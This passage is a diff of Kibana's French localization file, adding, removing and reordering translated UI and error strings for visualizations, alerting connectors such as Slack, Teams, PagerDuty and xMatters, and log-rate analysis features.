"visTypeXy.function.valueAxis.name.help": "Nom de l'axe des valeurs", - "visTypeXy.functions.help": "Visualisation XY", "visTypeXy.histogram.groupTitle": "Diviser la série", "visTypeXy.histogram.histogramDescription": "Présente les données en barres verticales sur un axe.", "visTypeXy.histogram.histogramTitle": "Barre verticale", - "visTypeXy.histogram.metricTitle": "Axe Y", + "visTypeXy.histogram.metricTitle": "Axe Y", "visTypeXy.histogram.radiusTitle": "Taille du point", "visTypeXy.histogram.segmentTitle": "Axe X", "visTypeXy.histogram.splitTitle": "Diviser le graphique", "visTypeXy.horizontalBar.groupTitle": "Diviser la série", "visTypeXy.horizontalBar.horizontalBarDescription": "Présente les données en barres horizontales sur un axe.", "visTypeXy.horizontalBar.horizontalBarTitle": "Barre horizontale", - "visTypeXy.horizontalBar.metricTitle": "Axe Y", + "visTypeXy.horizontalBar.metricTitle": "Axe Y", "visTypeXy.horizontalBar.radiusTitle": "Taille du point", "visTypeXy.horizontalBar.segmentTitle": "Axe X", "visTypeXy.horizontalBar.splitTitle": "Diviser le graphique", "visTypeXy.interpolationModes.smoothedText": "Lissé", "visTypeXy.interpolationModes.steppedText": "Par paliers", "visTypeXy.interpolationModes.straightText": "Droit", - "visTypeXy.legend.filterForValueButtonAriaLabel": "Filtre pour la valeur", - "visTypeXy.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "visTypeXy.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "visTypeXy.legendPositions.bottomText": "Bas", "visTypeXy.legendPositions.leftText": "Gauche", "visTypeXy.legendPositions.rightText": "Droite", @@ -7103,7 +6179,7 @@ "visTypeXy.line.groupTitle": "Diviser la série", "visTypeXy.line.lineDescription": "Affiche les données sous forme d'une série de points.", "visTypeXy.line.lineTitle": "Ligne", - "visTypeXy.line.metricTitle": "Axe Y", + "visTypeXy.line.metricTitle": "Axe Y", "visTypeXy.line.radiusTitle": "Taille du point", "visTypeXy.line.segmentTitle": "Axe X", "visTypeXy.line.splitTitle": "Diviser le graphique", @@ -7113,36 +6189,52 @@ "visTypeXy.thresholdLine.style.dashedText": "Tirets", "visTypeXy.thresholdLine.style.dotdashedText": "Point-tiret", "visTypeXy.thresholdLine.style.fullText": "Pleine", + "visualizations.byValue_pageHeading": "Visualisation de type {chartType} intégrée à l'application {originatingApp}", + "visualizations.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?", + "visualizations.confirmModal.overwriteTitle": "Écraser {name} ?", + "visualizations.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", + "visualizations.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", + "visualizations.disabledLabVisualizationTitle": "{title} est une visualisation lab.", + "visualizations.embeddable.legacyURLConflict.errorMessage": "Cette visualisation a la même URL qu'un alias hérité. Désactiver l'alias pour résoudre cette erreur : {json}", + "visualizations.experimentalVisInfoText": "Elle pourra être modifiée ou supprimée totalement dans une prochaine version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités en version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", + "visualizations.fallbackDataView.label": "{type} introuvable", + "visualizations.function.findAccessorOrFail.error.accessor": "Le nom de la colonne ou l'index fourni sont non valides : {accessor}", + "visualizations.legacyUrlConflict.objectNoun": "Visualisation {visName}", + "visualizations.missedDataView.errorMessage": "Impossible de trouver le {type} : {id}", + "visualizations.newChart.conditionalMessage.newLibrary": "Passer à la bibliothèque {type} dans {link}", + "visualizations.newGaugeChart.notificationMessage": "La nouvelle bibliothèque de graphiques de jauge ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}", + "visualizations.newHeatmapChart.notificationMessage": "La nouvelle bibliothèque de graphiques de cartes thermiques ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}", + "visualizations.newVisWizard.newVisTypeTitle": "Nouveau {visTypeName}", + "visualizations.newVisWizard.resultsFound": "{resultCount, plural, one {type trouvé} other {types trouvés}}", + "visualizations.noMatchRoute.bannerText": "L'application Visualize ne reconnaît pas cet itinéraire : {route}.", + "visualizations.oldPieChart.notificationMessage": "Vous utilisez la bibliothèque de graphiques existante qui sera supprimée dans une prochaine version. {conditionalMessage}", + "visualizations.pageHeading": "Visualisation {chartType} {chartName}", + "visualizations.reporting.defaultReportTitle": "Visualisation [{date}]", + "visualizations.topNavMenu.updatePanel": "Mettre à jour le panneau sur {originatingAppName}", + "visualizations.visualizationTypeInvalidMessage": "Type de visualisation non valide \"{visType}\"", + "visualizations.visualizeListingDashboardFlowDescription": "Vous créez un tableau de bord ? Créez et ajoutez vos visualisations directement depuis l'{dashboardApp}.", "visualizations.advancedSettings.visualizeEnableLabsText": "Si l'option est activée, elle vous permet de créer, d'afficher et de modifier des visualisations qui sont en version d'évaluation technique. Si elle est désactivée, seules les visualisations prêtes pour la production sont disponibles.", "visualizations.advancedSettings.visualizeEnableLabsTitle": "Activer les visualisations de la version d'évaluation technique", "visualizations.badge.readOnly.text": "Lecture seule", "visualizations.badge.readOnly.tooltip": "Impossible d'enregistrer les visualisations dans la bibliothèque", - "visualizations.byValue_pageHeading": "Visualisation de type {chartType} intégrée à l'application {originatingApp}", "visualizations.confirmModal.cancelButtonLabel": "Annuler", - "visualizations.confirmModal.confirmTextDescription": "Quitter l'éditeur Visualize sans enregistrer les modifications ?", + "visualizations.confirmModal.confirmTextDescription": "Quitter l'éditeur Visualize sans enregistrer les modifications ?", "visualizations.confirmModal.overwriteButtonLabel": "Écraser", - "visualizations.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?", - "visualizations.confirmModal.overwriteTitle": "Écraser {name} ?", - "visualizations.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", - "visualizations.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", "visualizations.confirmModal.title": "Modifications non enregistrées", "visualizations.controls.notificationMessage": "Les contrôles d'entrée sont déclassés et seront supprimés dans une prochaine version. Utilisez les nouveaux contrôles pour filtrer les données de votre tableau de bord et interagir avec elles. ", "visualizations.createVisualization.failedToLoadErrorMessage": "Impossible de charger la visualisation", "visualizations.createVisualization.noIndexPatternOrSavedSearchIdErrorMessage": "Vous devez fournir un indexPattern ou un savedSearchId", "visualizations.createVisualization.noVisTypeErrorMessage": "Vous devez fournir un type de visualisation valide", + "visualizations.dataView.label": "Vue de données", "visualizations.deprecatedTag": "Déclassé", "visualizations.disabledLabVisualizationLink": "Lire la documentation", "visualizations.disabledLabVisualizationMessage": "Veuillez activer le mode lab dans les paramètres avancés pour consulter les visualisations lab.", - "visualizations.disabledLabVisualizationTitle": "{title} est une visualisation lab.", "visualizations.displayName": "Visualisation", "visualizations.editor.createBreadcrumb": "Créer", "visualizations.editor.defaultEditBreadcrumbText": "Modifier la visualisation", "visualizations.embeddable.inspectorTitle": "Inspecteur", - "visualizations.embeddable.legacyURLConflict.errorMessage": "Cette visualisation a la même URL qu'un alias hérité. Désactiver l'alias pour résoudre cette erreur : {json}", "visualizations.embeddable.placeholderTitle": "Titre de l'espace réservé", - "visualizations.experimentalVisInfoText": "Elle pourra être modifiée ou supprimée totalement dans une prochaine version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités en version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", "visualizations.experimentalVisInfoTitle": "Cette fonctionnalité est en version d'évaluation technique.", - "visualizations.function.findAccessorOrFail.error.accessor": "Le nom de la colonne ou l'index fourni sont non valides : {accessor}", "visualizations.function.range.from.help": "Début de la plage", "visualizations.function.range.help": "Génère un objet plage", "visualizations.function.range.to.help": "Fin de la plage", @@ -7157,7 +6249,6 @@ "visualizations.function.xyDimension.visDimension.help": "Configuration de l'objet dimension", "visualizations.helpMenu.appName": "Bibliothèque Visualize", "visualizations.legacyCharts.conditionalMessage.noPermissions": "Contactez votre administrateur système pour passer à l'ancienne bibliothèque.", - "visualizations.legacyUrlConflict.objectNoun": "Visualisation {visName}", "visualizations.linkedToSearch.unlinkSuccessNotificationText": "Dissocié de la recherche enregistrée \"{searchTitle}\"", "visualizations.listing.betaTitle": "Version bêta", "visualizations.listing.betaTooltip": "Cette visualisation est en version bêta et susceptible d'être modifiée. La conception et le code sont moins matures que les fonctionnalités officielles en disponibilité générale et sont fournis tels quels sans aucune garantie. Les fonctionnalités bêta ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale", @@ -7177,11 +6268,8 @@ "visualizations.missedDataView.dataViewReconfigure": "Recréez-la dans la page de gestion des vues de données.", "visualizations.missedDataView.editInVisualizeEditor": "Effectuer des modifications dans l'éditeur Visualize pour corriger l'erreur", "visualizations.newChart.conditionalMessage.advancedSettingsLink": "Paramètres avancés.", - "visualizations.newChart.conditionalMessage.newLibrary": "Passer à la bibliothèque {type} dans {link}", "visualizations.newChart.libraryMode.new": "nouveau", "visualizations.newChart.libraryMode.old": "âge", - "visualizations.newGaugeChart.notificationMessage": "La nouvelle bibliothèque de graphiques de jauge ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}", - "visualizations.newHeatmapChart.notificationMessage": "La nouvelle bibliothèque de graphiques de cartes thermiques ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}", "visualizations.newVisWizard.aggBasedGroupDescription": "Utilisez notre bibliothèque Visualize classique pour créer des graphiques basés sur des agrégations.", "visualizations.newVisWizard.aggBasedGroupTitle": "Basé sur une agrégation", "visualizations.newVisWizard.chooseSourceTitle": "Choisir une source", @@ -7191,25 +6279,22 @@ "visualizations.newVisWizard.filterVisTypeAriaLabel": "Filtrer un type de visualisation", "visualizations.newVisWizard.goBackLink": "Sélectionner une visualisation différente", "visualizations.newVisWizard.helpTextAriaLabel": "Commencez à créer votre visualisation en sélectionnant un type pour cette visualisation. Appuyez sur Échap pour fermer ce mode. Appuyez sur Tab pour aller plus loin.", - "visualizations.newVisWizard.learnMoreText": "Envie d'en savoir plus ?", - "visualizations.newVisWizard.newVisTypeTitle": "Nouveau {visTypeName}", + "visualizations.newVisWizard.learnMoreText": "Envie d'en savoir plus ?", "visualizations.newVisWizard.readDocumentationLink": "Lire la documentation", - "visualizations.newVisWizard.resultsFound": "{resultCount, plural, one {type trouvé} other {types trouvés}}", "visualizations.newVisWizard.searchSelection.notFoundLabel": "Aucun recherche enregistrée ni aucun index correspondants n'ont été trouvés.", "visualizations.newVisWizard.searchSelection.savedObjectType.dataView": "Vue de données", "visualizations.newVisWizard.searchSelection.savedObjectType.search": "Recherche enregistrée", "visualizations.newVisWizard.title": "Nouvelle visualisation", "visualizations.newVisWizard.toolsGroupTitle": "Outils", - "visualizations.noMatchRoute.bannerText": "L'application Visualize ne reconnaît pas cet itinéraire : {route}.", + "visualizations.noDataView.label": "vue de données", "visualizations.noMatchRoute.bannerTitleText": "Page introuvable", "visualizations.noResultsFoundTitle": "Résultat introuvable", - "visualizations.oldPieChart.notificationMessage": "Vous utilisez la bibliothèque de graphiques existante qui sera supprimée dans une prochaine version. {conditionalMessage}", + "visualizations.noSearch.label": "rechercher", "visualizations.overwriteRejectedDescription": "La confirmation d'écrasement a été rejetée.", - "visualizations.pageHeading": "Visualisation {chartType} {chartName}", - "visualizations.reporting.defaultReportTitle": "Visualisation [{date}]", "visualizations.savedObjectName": "Visualisation", "visualizations.saveDuplicateRejectedDescription": "La confirmation d'enregistrement avec un doublon de titre a été rejetée.", "visualizations.savingVisualizationFailed.errorMsg": "L'enregistrement de la visualisation a échoué", + "visualizations.search.label": "Recherche", "visualizations.tonNavMenu.tryItBadgeText": "Essayer", "visualizations.topNavMenu.cancelAndReturnButtonTooltip": "Abandonner vos modifications avant de terminer", "visualizations.topNavMenu.cancelButtonAriaLabel": "Revenir à la dernière application sans enregistrer les modifications", @@ -7232,43 +6317,74 @@ "visualizations.topNavMenu.saveVisualizationToLibraryButtonLabel": "Enregistrer dans la bibliothèque", "visualizations.topNavMenu.shareVisualizationButtonAriaLabel": "Partager la visualisation", "visualizations.topNavMenu.shareVisualizationButtonLabel": "partager", - "visualizations.topNavMenu.updatePanel": "Mettre à jour le panneau sur {originatingAppName}", "visualizations.visualizationLoadingFailedErrorMessage": "Impossible de charger la visualisation", - "visualizations.visualizationTypeInvalidMessage": "Type de visualisation non valide \"{visType}\"", "visualizations.visualizeDescription": "Créez des visualisations et des datastores agrégés dans vos index Elasticsearch.", "visualizations.visualizeListingBreadcrumbsTitle": "Bibliothèque Visualize", "visualizations.visualizeListingDashboardAppName": "Application Tableau de bord", - "visualizations.visualizeListingDashboardFlowDescription": "Vous créez un tableau de bord ? Créez et ajoutez vos visualisations directement depuis l'{dashboardApp}.", "visualizations.visualizeListingDeleteErrorTitle": "Erreur lors de la suppression de la visualisation", "xpack.actions.actionTypeRegistry.get.missingActionTypeErrorMessage": "Le type d'action \"{id}\" n'est pas enregistré.", "xpack.actions.actionTypeRegistry.register.duplicateActionTypeErrorMessage": "Le type d'action \"{id}\" est déjà enregistré.", + "xpack.actions.actionTypeRegistry.register.invalidConnectorFeatureIds": "ID \"{ids}\" de fonctionnalité non valides pour le type de connecteur \"{connectorTypeId}\".", + "xpack.actions.actionTypeRegistry.register.missingSupportedFeatureIds": "Au moins une valeur \"supportedFeatureId\" doit être fournie pour le type de connecteur \"{connectorTypeId}\".", + "xpack.actions.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.casesWebhook.casesWebhookConfigurationError": "erreur lors de la configuration de l'action webhook des cas : {err}", + "xpack.actions.builtin.casesWebhook.casesWebhookConfigurationErrorNoHostname": "erreur lors de la configuration de l'action webhook des cas : impossible d'analyser l'url {url} : {err}", + "xpack.actions.builtin.casesWebhook.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.configuration.apiValidateMissingOAuthFieldError": "{field} doit être fourni quand isOAuth = {isOAuth}", + "xpack.actions.builtin.configuration.apiValidateOAuthFieldError": "{field} ne doit pas être fourni quand isOAuth = {isOAuth}", + "xpack.actions.builtin.email.customViewInKibanaMessage": "Ce message a été envoyé par Kibana. [{kibanaFooterLinkText}]({link}).", + "xpack.actions.builtin.jira.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.pagerduty.invalidTimestampErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\"", + "xpack.actions.builtin.pagerduty.missingDedupkeyErrorMessage": "DedupKey est requis lorsque eventAction est \"{eventAction}\"", + "xpack.actions.builtin.pagerduty.pagerdutyConfigurationError": "erreur lors de la configuration de l'action pagerduty : {message}", + "xpack.actions.builtin.pagerduty.postingRetryErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut http {status}, réessayer ultérieurement", + "xpack.actions.builtin.pagerduty.postingUnexpectedErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut inattendu {status}", + "xpack.actions.builtin.pagerduty.timestampParsingFailedErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\" : {message}", + "xpack.actions.builtin.slack.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message slack, réessayer à cette date/heure : {retryString}", + "xpack.actions.builtin.slack.slackConfigurationError": "erreur lors de la configuration de l'action slack : {message}", + "xpack.actions.builtin.slack.unexpectedHttpResponseErrorMessage": "réponse http inattendue de Slack : {httpStatus} {httpStatusText}", + "xpack.actions.builtin.swimlane.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.teams.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message Microsoft Teams, réessayer à cette date/heure : {retryString}", + "xpack.actions.builtin.teams.teamsConfigurationError": "erreur lors de la configuration de l'action teams : {message}", + "xpack.actions.builtin.webhook.invalidResponseRetryDateErrorMessage": "erreur lors de l'appel de webhook, réessayer à cette date/heure : {retryString}", + "xpack.actions.builtin.webhook.webhookConfigurationError": "erreur lors de la configuration de l'action webhook : {message}", + "xpack.actions.builtin.webhook.webhookConfigurationErrorNoHostname": "erreur lors de la configuration de l'action webhook : impossible d'analyser l'url : {err}", + "xpack.actions.builtin.xmatters.postingRetryErrorMessage": "Erreur lors du déclenchement du flux xMatters : statut http {status}, réessayer plus tard", + "xpack.actions.builtin.xmatters.unexpectedStatusErrorMessage": "Erreur de déclenchement du flux xMatters : statut inattendu {status}", + "xpack.actions.builtin.xmatters.xmattersConfigurationError": "Erreur lors de la configuration de l'action xMatters : {message}", + "xpack.actions.builtin.xmatters.xmattersConfigurationErrorNoHostname": "Erreur lors de la configuration de l'action xMatters : impossible d'analyser l'url : {err}", + "xpack.actions.builtin.xmatters.xmattersHostnameNotAllowed": "{message}", + "xpack.actions.builtin.xmatters.xmattersInvalidUrlError": "secretsUrl non valide : {err}", + "xpack.actions.disabledActionTypeError": "le type d'action \"{actionType}\" n'est pas activé dans la configuration Kibana xpack.actions.enabledActionTypes", + "xpack.actions.savedObjects.onImportText": "{connectorsWithSecretsLength} {connectorsWithSecretsLength, plural, one {Le connecteur contient} other {Les connecteurs contiennent}} des informations sensibles qui requièrent des mises à jour.", + "xpack.actions.serverSideErrors.expirerdLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} a expiré.", + "xpack.actions.serverSideErrors.invalidLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} ne le prend pas en charge. Veuillez mettre à niveau votre licence.", + "xpack.actions.serverSideErrors.predefinedActionDeleteDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des suppressions.", + "xpack.actions.serverSideErrors.predefinedActionUpdateDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des mises à jour.", + "xpack.actions.serverSideErrors.unavailableLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car les informations de licence ne sont pas disponibles actuellement.", + "xpack.actions.urlAllowedHostsConfigurationError": "Le {field} cible \"{value}\" n'est pas ajouté à la configuration Kibana xpack.actions.allowedHosts", "xpack.actions.alertHistoryEsIndexConnector.name": "Index Elasticsearch d'historique d'alertes", - "xpack.actions.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", "xpack.actions.appName": "Actions", + "xpack.actions.availableConnectorFeatures.alerting": "Alerting", + "xpack.actions.availableConnectorFeatures.cases": "Cas", + "xpack.actions.availableConnectorFeatures.securitySolution": "Solution de sécurité", + "xpack.actions.availableConnectorFeatures.uptime": "Uptime", "xpack.actions.builtin.case.swimlaneTitle": "Swimlane", + "xpack.actions.builtin.cases.casesWebhookTitle": "Webhook - Gestion des cas", "xpack.actions.builtin.cases.jiraTitle": "Jira", "xpack.actions.builtin.cases.resilientTitle": "IBM Resilient", - "xpack.actions.builtin.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.casesWebhook.invalidUsernamePassword": "l'utilisateur et le mot de passe doivent être spécifiés", "xpack.actions.builtin.configuration.apiBasicAuthCredentialsError": "le nom d'utilisateur et le mot de passe doivent être tous deux spécifiés", "xpack.actions.builtin.configuration.apiCredentialsError": "Les informations d'identification auth ou OAuth de base doivent être spécifiées", "xpack.actions.builtin.configuration.apiOAuthCredentialsError": "clientSecret et privateKey doivent tous deux être spécifiés", - "xpack.actions.builtin.configuration.apiValidateMissingOAuthFieldError": "{field} doit être fourni quand isOAuth = {isOAuth}", - "xpack.actions.builtin.configuration.apiValidateOAuthFieldError": "{field} ne doit pas être fourni quand isOAuth = {isOAuth}", - "xpack.actions.builtin.email.customViewInKibanaMessage": "Ce message a été envoyé par Kibana. [{kibanaFooterLinkText}]({link}).", "xpack.actions.builtin.email.errorSendingErrorMessage": "erreur lors de l'envoi de l'e-mail", "xpack.actions.builtin.email.kibanaFooterLinkText": "Accéder à Kibana", "xpack.actions.builtin.email.sentByKibanaMessage": "Ce message a été envoyé par Kibana.", "xpack.actions.builtin.emailTitle": "E-mail", "xpack.actions.builtin.esIndex.errorIndexingErrorMessage": "erreur lors de l'indexation des documents", "xpack.actions.builtin.esIndexTitle": "Index", - "xpack.actions.builtin.jira.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", - "xpack.actions.builtin.pagerduty.invalidTimestampErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\"", - "xpack.actions.builtin.pagerduty.missingDedupkeyErrorMessage": "DedupKey est requis lorsque eventAction est \"{eventAction}\"", - "xpack.actions.builtin.pagerduty.pagerdutyConfigurationError": "erreur lors de la configuration de l'action pagerduty : {message}", "xpack.actions.builtin.pagerduty.postingErrorMessage": "erreur lors de la publication de l'événement pagerduty", - "xpack.actions.builtin.pagerduty.postingRetryErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut http {status}, réessayer ultérieurement", - "xpack.actions.builtin.pagerduty.postingUnexpectedErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut inattendu {status}", - "xpack.actions.builtin.pagerduty.timestampParsingFailedErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\" : {message}", "xpack.actions.builtin.pagerdutyTitle": "PagerDuty", "xpack.actions.builtin.serverLog.errorLoggingErrorMessage": "erreur lors du logging du message", "xpack.actions.builtin.serverLogTitle": "Log de serveur", @@ -7277,30 +6393,21 @@ "xpack.actions.builtin.serviceNowSIRTitle": "ServiceNow SecOps", "xpack.actions.builtin.serviceNowTitle": "ServiceNow", "xpack.actions.builtin.slack.errorPostingErrorMessage": "erreur lors de la publication du message slack", - "xpack.actions.builtin.slack.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message slack, réessayer à cette date/heure : {retryString}", "xpack.actions.builtin.slack.errorPostingRetryLaterErrorMessage": "erreur lors de la publication d'un message slack, réessayer ultérieurement", - "xpack.actions.builtin.slack.slackConfigurationError": "erreur lors de la configuration de l'action slack : {message}", - "xpack.actions.builtin.slack.slackConfigurationErrorNoHostname": "erreur lors de la configuration de l'action slack : impossible d'analyser le nom de l'hôte depuis webhookUrl", - "xpack.actions.builtin.slack.unexpectedHttpResponseErrorMessage": "réponse http inattendue de Slack : {httpStatus} {httpStatusText}", + "xpack.actions.builtin.slack.slackConfigurationErrorNoHostname": "erreur lors de la configuration de l'action slack : impossible d'analyser le nom de l'hôte depuis webhookUrl", "xpack.actions.builtin.slack.unexpectedNullResponseErrorMessage": "réponse nulle inattendue de Slack", "xpack.actions.builtin.slackTitle": "Slack", - "xpack.actions.builtin.swimlane.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", "xpack.actions.builtin.swimlaneTitle": "Swimlane", - "xpack.actions.builtin.teams.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message Microsoft Teams, réessayer à cette date/heure : {retryString}", "xpack.actions.builtin.teams.errorPostingRetryLaterErrorMessage": "erreur lors de la publication d'un message Microsoft Teams, réessayer ultérieurement", "xpack.actions.builtin.teams.invalidResponseErrorMessage": "erreur lors de la publication sur Microsoft Teams, réponse non valide", - "xpack.actions.builtin.teams.teamsConfigurationError": "erreur lors de la configuration de l'action teams : {message}", - "xpack.actions.builtin.teams.teamsConfigurationErrorNoHostname": "erreur lors de la configuration de l'action teams : impossible d'analyser le nom de l'hôte depuis webhookUrl", + "xpack.actions.builtin.teams.teamsConfigurationErrorNoHostname": "erreur lors de la configuration de l'action teams : impossible d'analyser le nom de l'hôte depuis webhookUrl", "xpack.actions.builtin.teams.unreachableErrorMessage": "erreur lors de la publication sur Microsoft Teams, erreur inattendue", "xpack.actions.builtin.teamsTitle": "Microsoft Teams", "xpack.actions.builtin.webhook.invalidResponseErrorMessage": "erreur lors de l'appel de webhook, réponse non valide", - "xpack.actions.builtin.webhook.invalidResponseRetryDateErrorMessage": "erreur lors de l'appel de webhook, réessayer à cette date/heure : {retryString}", "xpack.actions.builtin.webhook.invalidResponseRetryLaterErrorMessage": "erreur lors de l'appel de webhook, réessayer ultérieurement", "xpack.actions.builtin.webhook.invalidUsernamePassword": "l'utilisateur et le mot de passe doivent être spécifiés", "xpack.actions.builtin.webhook.requestFailedErrorMessage": "erreur lors de l'appel de webhook, requête échouée", "xpack.actions.builtin.webhook.unreachableErrorMessage": "erreur lors de l'appel de webhook, erreur inattendue", - "xpack.actions.builtin.webhook.webhookConfigurationError": "erreur lors de la configuration de l'action webhook : {message}", - "xpack.actions.builtin.webhook.webhookConfigurationErrorNoHostname": "erreur lors de la configuration de l'action webhook : impossible d'analyser l'url : {err}", "xpack.actions.builtin.webhookTitle": "Webhook", "xpack.actions.builtin.xmatters.invalidUsernamePassword": "L'utilisateur et le mot de passe doivent être spécifiés.", "xpack.actions.builtin.xmatters.missingConfigUrl": "Fournir une configUrl valide", @@ -7310,60 +6417,213 @@ "xpack.actions.builtin.xmatters.noSecretsProvided": "Fournir le lien secretsUrl ou le nom d'utilisateur/le mot de passe pour vous authentifier", "xpack.actions.builtin.xmatters.noUserPassWhenSecretsUrl": "Impossible d'utiliser le nom d'utilisateur/le mot de passe pour l'authentification de l'URL. Fournir une secretsUrl valide ou utiliser l'authentification de base.", "xpack.actions.builtin.xmatters.postingErrorMessage": "Erreur de déclenchement du workflow xMatters", - "xpack.actions.builtin.xmatters.postingRetryErrorMessage": "Erreur lors du déclenchement du flux xMatters : statut http {status}, réessayer plus tard", "xpack.actions.builtin.xmatters.shouldNotHaveConfigUrl": "configUrl ne doit pas être fournie lorsque usesBasic est faux", "xpack.actions.builtin.xmatters.shouldNotHaveSecretsUrl": "secretsUrl ne doit pas être fournie lorsque usesBasic est vrai", "xpack.actions.builtin.xmatters.shouldNotHaveUsernamePassword": "Le nom d'utilisateur et le mot de passe ne doivent pas être fournis lorsque usesBasic est faux", - "xpack.actions.builtin.xmatters.unexpectedStatusErrorMessage": "Erreur de déclenchement du flux xMatters : statut inattendu {status}", - "xpack.actions.builtin.xmatters.xmattersConfigurationError": "Erreur lors de la configuration de l'action xMatters : {message}", - "xpack.actions.builtin.xmatters.xmattersConfigurationErrorNoHostname": "Erreur lors de la configuration de l'action xMatters : impossible d'analyser l'url : {err}", - "xpack.actions.builtin.xmatters.xmattersHostnameNotAllowed": "{message}", - "xpack.actions.builtin.xmatters.xmattersInvalidUrlError": "secretsUrl non valide : {err}", "xpack.actions.builtin.xmattersTitle": "xMatters", - "xpack.actions.disabledActionTypeError": "le type d'action \"{actionType}\" n'est pas activé dans la configuration Kibana xpack.actions.enabledActionTypes", "xpack.actions.featureRegistry.actionsFeatureName": "Actions et connecteurs", "xpack.actions.savedObjects.goToConnectorsButtonText": "Accéder aux connecteurs", - "xpack.actions.savedObjects.onImportText": "{connectorsWithSecretsLength} {connectorsWithSecretsLength, plural, one {Le connecteur contient} other {Les connecteurs contiennent}} des informations sensibles qui requièrent des mises à jour.", - "xpack.actions.serverSideErrors.expirerdLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} a expiré.", - "xpack.actions.serverSideErrors.invalidLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} ne le prend pas en charge. Veuillez mettre à niveau votre licence.", - "xpack.actions.serverSideErrors.predefinedActionDeleteDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des suppressions.", - "xpack.actions.serverSideErrors.predefinedActionUpdateDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des mises à jour.", - "xpack.actions.serverSideErrors.unavailableLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car les informations de licence ne sont pas disponibles actuellement.", "xpack.actions.serverSideErrors.unavailableLicenseInformationErrorMessage": "Les actions sont indisponibles - les informations de licence ne sont pas disponibles actuellement.", - "xpack.actions.urlAllowedHostsConfigurationError": "Le {field} cible \"{value}\" n'est pas ajouté à la configuration Kibana xpack.actions.allowedHosts", + "xpack.aiops.explainLogRateSpikes.loadingState.identifiedFieldCandidates": "{fieldCandidatesCount, plural, one {# candidat de champ identifié} other {# candidats de champs identifiés}}.", + "xpack.aiops.explainLogRateSpikes.loadingState.identifiedFieldValuePairs": "{fieldValuePairsCount, plural, one {# paire significative champ/valeur identifiée} other {# paires significatives champ/valeur identifiées}}.", + "xpack.aiops.index.dataLoader.internalServerErrorMessage": "Erreur lors du chargement des données dans l'index {index}. {message}. La requête a peut-être expiré. Essayez d'utiliser un échantillon d'une taille inférieure ou de réduire la plage temporelle.", + "xpack.aiops.index.dataViewNotBasedOnTimeSeriesNotificationTitle": "La vue de données {dataViewTitle} n'est pas basée sur une série temporelle", + "xpack.aiops.index.errorLoadingDataMessage": "Erreur lors du chargement des données dans l'index {index}. {message}.", + "xpack.aiops.progressTitle": "Progression : {progress} % — {progressMessage}", + "xpack.aiops.searchPanel.totalDocCountLabel": "Total des documents : {strongTotalCount}", + "xpack.aiops.searchPanel.totalDocCountNumber": "{totalCount, plural, other {#}}", + "xpack.aiops.correlations.failedTransactions.correlationsTable.fieldNameLabel": "Nom du champ", + "xpack.aiops.correlations.failedTransactions.correlationsTable.fieldValueLabel": "Valeur du champ", + "xpack.aiops.correlations.failedTransactions.correlationsTable.impactLabel": "Impact", + "xpack.aiops.correlations.failedTransactions.correlationsTable.impactLabelColumnTooltip": "Le niveau d'impact du champ sur la différence de taux de messages", + "xpack.aiops.correlations.failedTransactions.correlationsTable.logRateColumnTooltip": "Une 